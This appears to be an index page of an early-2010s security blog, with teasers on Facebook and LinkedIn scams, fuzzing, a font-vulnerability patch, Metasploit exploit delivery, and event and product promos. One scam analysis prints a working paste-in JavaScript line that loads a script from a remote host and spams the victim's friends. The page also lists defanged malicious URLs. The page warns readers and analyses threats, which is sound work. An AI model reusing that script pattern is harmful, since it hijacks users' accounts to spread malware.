blogs

I was checking my facebook and suddenly following caught my attention:

on clicking on the download button, it downloaded an exntesion for my firefox. so i decided to analyze it. i have unpacked it and i see following:

on opening the file youtube.js, i can see the following code:

it download a script from another source, so lets see what does it contains:  read more »

there is a new scam on facebook, which display a message - free avtar dvd.
it points to avtar-dvd.info url. if you click on it, it will display a link to servey as below:

on clicking on it, you have to fill a survey:

beware, no one gives you a blockbuster movie dvd for free :)

I have been working with metasploit and sulley lately for developing couple of fuzzers. i think sulley is a much better choice for writing fuzzers. reason is it does intelligent fuzzing rather then dumb fuzzing.
for example if you got one protocol where length is denoted as 2 byte BE. it make sense to fuzz at extream values i.e. 0xFFFF or 0x0000 it does not make sense to fuzz each and every value like 0x0002,0x0003.
sulley does a good job here. while in metasploit you need to generate random data which can be of any range.  read more »

Faced a minor problem with Lorcon2 wrapper module, in compiling with ruby 1.9.2 . following will fix the issues for those who are facing it:

change STRCCSTR function in file ruby-lorcon-1.0.0/Lorcon.c at line 443,441:

driver = STR2CSTR(rbdriver);
intf = STR2CSTR(rbintf);

as

driver = StringValuePtr(rbdriver);
intf = StringValuePtr(rbintf);

Hope it helps.

Hacker Halted USA, October 21-27 in Miami, is the EC-Council's flagship IT security event for both technical experts and C-Level executives. It hosts lots of technical training courses and a two-day conference with exhibits.

The conference track themes include cloud security, SCADA, and timely topics chosen by peer review and input from 450 training companies worldwide.  read more »

it seems that apple jailbreakme pdf which were using a 0 day according to vupen has been fixed.

if we see the patch only a minor check was added:

+ if ( arg_cnt < 0 || subr_no < 0 )
+ goto Unexpected_OtherSubr;


so as you might have guessed, vulnerability is if a font file has arg_cnt < 0 or subr_no then is > 0x7FFFFFFF then it will cause problems :)

cheers,
secgeek

I have come across another scam with title "Photographer commited SUICIDE 3 days after shooting THIS video!".

It basically display following on infected user's profile:

After user click on Jaa, it will use a new trick,it will open facebook share page and resize it, when you click on jaa,it will share the link on user's profile.

after that it will open a survey.
 read more »

So here is another one in Osama's related dead scam. this one sends chat message to your friends on facebook. It sends a url in tinyurl form which on opening displays following page:

it tell you to copy and paste following javascript code:

javascript:(a=(b=document).createElement('script')).src='//pro..info/u.php?'+Math.random(),b.body.appendChild(a);void(0)


when you paste the javascript code in your address bar,it send the malicious links to all your friends on facebook.  read more »

So today is the day when Prince William & Catherine got married and scammer started using this already for facebook likejacking.
we got one url which on opening display a message:
"Prince William & Catherine Middleton First Kiss Video" and shows following picture:

when we see the code it contains following javascript code:

so there is one like TAG.
 read more »

I have been working with metasploit. sometimes i want to use fileformat modules to be delivered by web. but mostly metasploit creates the exploit files in C:\framework\msf3\data\exploits folder.
now what if i want to run a webserver and deliver these to the client? i have to do it manually. this happens with most of the fileformat modules.
so if you faced same problem then you can follow the tips i am going to mention in this article.
lets take a simple module C:\framework\msf3\modules\exploits\windows\fileformat\adobe_jbig2decode.rb  read more »

Dear Users,

I have noticed that secgeeks.com have visitors from so many countries and not all of them knows English which is the primary language for the site. so i have added Google translate feature to the secgeeks.com . you can see it in the right hand side. using this feature you can translate the secgeeks.com in your fav language.

Happy new year 2011 and i hope you will enjoy this feature.

Thanks,
SecGeek

I have used both the debugger, windbg and olly. but i like windbg because of various reasons:
1. it has symbol support. you can just add the symbol path in the config and it will give you all the function names during the debugging. this you can do in olly too. but using windbg is better.
2. you can user various windows like dissembly,memory and command. well this make sense if you are debugging and you need to quickly check memory or dissembly.
3. it has command line support. well it speed up the debugging.
4. remote debugging, you can debug remotely.

which one do you use and why?

Dear All,
Secgeeks.com wishes you all a very happy new year 2011.

"May what you see in the mirror delight you, and what others see in you delight them. May someone love you enough to forgive your faults, be blind to your blemishes, and tell the world about your virtues.

May the telemarketers wait to make their sales calls until you finish dinner, may the commercials on TV not be louder than the program you have been watching, and may your check book and your budget balance - and include generous amounts for charity. "

Wishing you again a very happy new year.  read more »

Have you ever forgotten Active Directory (AD) password? Do you know how to reset AD password? Is there any Windows password reset software to do AD password reset? If not, what to do to reset AD password? Before answering these questions and do AD password reset, you need to what is active directory, Windows domain and domain controller.

What is Active Directory?  read more »

If you are a linked user then be careful in opening any message with subject "LinkedIn Messages" .I am receving lots of such emails like below:

all links in these mails points to various malicious urls like:
h..p://igslhplb.info/
h..p://axhgdldg.info/
h..p://inqqxrun.info/
h..p://dydokreo.info/
h..p://ckafaupi.info/
h..p://qigeszwu.info/
h..p://cvxqpqfi.info/
h..p://cwqrvoyn.info/
h..p://ezmaprvw.info/
h..p://uerpideo.info/

etc.  read more »

I have received couple of email pretending to come form alert@ebay.ws . it contains following message body:
"According to eBay @ 2010 license agreement , you are required to
update your eBay Buyer Protection service .
Please read and fill in the attached form , then sign in to your
account and start buy or sell in minutes , with our new easy to
use features , now with lots of discounted offers ."

Email contains a HTML attachment,which opned gives you a page like this:
 read more »

Today many PC users are easy to forget Windows passwords they set for their computers. Windows Password Unlocker Standard is designed to help users recover forgotten Windows administrator password and other user password by burning a bootable CD/DVD. If you’ve forgot Windows password, you try this Windows password recovery tool and follow the below instructions to recover your lost password.

Before starting, a bootable CD/DVD and a computer with CD drive are required. (Internal CD drive and external CD drive are both OK.)  read more »

The most popular trend in nowadays Internet scam is fake and rogue antispyware. Such antispyware try to convince users that they have plenty of infections to remove showing basically the same alerts and nag screens as regular software products combating viruses.  read more »

It seems that spammers are now started using well known LinkedIn.com website to spam users. i got a message from a unknown user stating me to connect to his network on linkedin.But then when i carefully looked at the links i found that the links int he email does not points to the linkedin.com but they point to hxxp://lccvnvxx.info/

see the image below:

So if you have receive any such invitation to connect on linked,then double check it!!

Make plans now to attend the fifteenth annual Hacker Halted information security event - October 9-15 in Miami. The format includes a 4-day training Academy, followed by a 2-day conference on October 13-14 and 1-day of free Training (October 15) for all registrants. The two-day Conference features a comprehensive program presented in three tracks.

Register for the 2-day conference by August 31 and receive a FREE iPad onsite. No tricks or anything else to purchase.  read more »